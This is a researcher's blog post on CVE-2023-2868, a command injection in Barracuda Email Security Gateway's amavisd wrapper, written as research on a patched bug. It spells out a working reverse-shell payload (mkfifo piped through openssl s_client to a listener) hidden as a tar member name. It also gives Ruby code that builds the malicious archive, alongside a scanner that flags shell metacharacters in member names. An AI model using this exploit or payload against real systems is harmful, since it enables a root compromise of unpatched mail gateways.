Some of my past research work involved crafting one of the first public proofs of concept for CVE-2023-2868, a command injection vulnerability in Barracuda's Email Security Gateway appliance. My writeup can be found on AttackerKB, and my original Ruby PoC code can be found here.
CVE-2023-2868 is a command injection vulnerability in Barracuda ESG's custom wrapper for amavisd: the wrapper hands the names of the files inside an incoming .tar attachment to a shell (Perl's qx operator) without sanitising them, so a crafted member name is executed as a command. A .tar file in the following format would trigger RCE:

randomLetters.tar <- name of the tar file
- `setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect #{LHOST}:#{LPORT} >/tmp/p 2>/dev/null;rm /tmp/p"` <- the filename of a subfile within the tar file; the subfile's contents are random. `#{LHOST}` and `#{LPORT}` are Ruby string interpolations of the listener address from the PoC.
This is a reconstruction of the details hinted at in Mandiant's blog, and it works exactly as is.
The vulnerability has since been patched. However, for those who have an unpatched ESG appliance on their kitchen counter, CVE-2023-2868 can be used to get a root shell for further research. This post will explore that opportunity.
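As an added example (this is not the original Ruby PoC linked above, and not Barracuda's code), the script below builds a ustar archive whose single member carries the filename shown above, then walks the archive's headers and flags member names containing shell metacharacters, which is the check a mail gateway or quarantine scanner would want for this bug class. The listener address 10.0.0.1:4444 and the member contents are made up; every function and constant name here is the example's own.

```ruby
# Added example, not the original PoC. Writes a ustar archive by hand so the
# reader can see exactly where a member name lives (100-byte name field plus
# 155-byte prefix), then scans archives for names that would be interpreted
# by a shell if a wrapper passed them to qx// or system().
# 10.0.0.1:4444 is a made-up listener address.

BLOCK = 512

# Fixed-width, NUL-terminated octal field as the ustar header expects.
def octal(n, width)
  format("%0#{width - 1}o\0", n)
end

# ustar stores names longer than 100 bytes as prefix(155) + '/' + name(100);
# readers re-join them, so the full injection string survives the archive.
# Assumes ASCII names (index is character-based).
def split_name(name)
  return [name, ''] if name.bytesize <= 100
  cut = name.index('/', [name.bytesize - 101, 0].max)
  raise ArgumentError, "no usable split point in #{name.inspect}" if cut.nil? || cut > 155
  [name[(cut + 1)..], name[0...cut]]
end

def tar_header(name, size)
  base, prefix = split_name(name)
  fields = [base, octal(0o644, 8), octal(0, 8), octal(0, 8), octal(size, 12), octal(0, 12),
            ' ' * 8, '0', '', "ustar\0", '00', 'root', 'root', octal(0, 8), octal(0, 8), prefix]
  hdr = fields.pack('a100 a8 a8 a8 a12 a12 a8 a a100 a6 a2 a32 a32 a8 a8 a155').ljust(BLOCK, "\0")
  # Checksum: byte sum of the header with the checksum field read as 8 spaces.
  hdr[148, 8] = format("%06o\0 ", hdr.bytes.sum)
  hdr
end

# entries: [[member_name, contents], ...] -> raw tar bytes
def build_tar(entries)
  out = String.new(encoding: Encoding::BINARY)
  entries.each do |name, data|
    data = data.b
    out << tar_header(name, data.bytesize) << data
    out << "\0" * ((BLOCK - data.bytesize % BLOCK) % BLOCK)   # pad contents to a block
  end
  out << "\0" * (2 * BLOCK)   # end-of-archive marker
end

# The member name from the writeup; only the listener address is a parameter.
def injection_filename(lhost, lport)
  %(setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect #{lhost}:#{lport} >/tmp/p 2>/dev/null;rm /tmp/p")
end

# Walk headers only (contents are skipped by size), verify each checksum,
# and return the full member names with prefix re-joined.
def tar_member_names(bytes)
  names = []
  off = 0
  while off + BLOCK <= bytes.bytesize
    hdr = bytes.byteslice(off, BLOCK)
    break if hdr.bytes.all?(&:zero?)
    stored = hdr.byteslice(148, 8).unpack1('Z8').to_i(8)
    computed = hdr.bytes.sum - hdr.byteslice(148, 8).bytes.sum + 8 * 32
    raise "bad header checksum at offset #{off}" unless stored == computed
    base   = hdr.unpack1('Z100')
    size   = hdr.byteslice(124, 12).unpack1('Z12').to_i(8)
    magic  = hdr.byteslice(257, 6).unpack1('Z6')
    prefix = hdr.byteslice(345, 155).unpack1('Z155')
    names << (magic == 'ustar' && !prefix.empty? ? "#{prefix}/#{base}" : base)
    off += BLOCK + ((size + BLOCK - 1) / BLOCK) * BLOCK
  end
  names
end

# Characters a shell interprets rather than treating as part of a path.
SHELL_META = /[;&|`$<>()]/

def suspicious_members(bytes)
  tar_member_names(bytes).grep(SHELL_META)
end

if __FILE__ == $PROGRAM_NAME
  tar = build_tar([[injection_filename('10.0.0.1', '4444'), 'random bytes']])
  puts "members: #{tar_member_names(tar).inspect}"
  puts "flagged: #{suspicious_members(tar).size}"
end
```

`File.binwrite('poc.tar', build_tar([[injection_filename(lhost, lport), 'x']]))` writes the archive; `tar tvf poc.tar` lists the member with the long name reassembled from prefix and name. The split matters: the injection string is well over 100 bytes, so a writer that only emits the old v7 header layout cannot carry it, and a scanner that reads only the 100-byte name field would see a truncated, harmless-looking fragment. Check the re-joined name, as the parser here does.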
Let’s start from the complete beginning with the Barracuda ESG 300 appliance. First you gotta get one. Barraguard is a certified seller, but you may get lucky on eBay.
Once you get the device, plug in peripherals (keyboard, mouse, monitor) and power it up. Perform a hard factory reset by pressing the “reset” button with a pin for several seconds until it restarts. This ensures a clean state.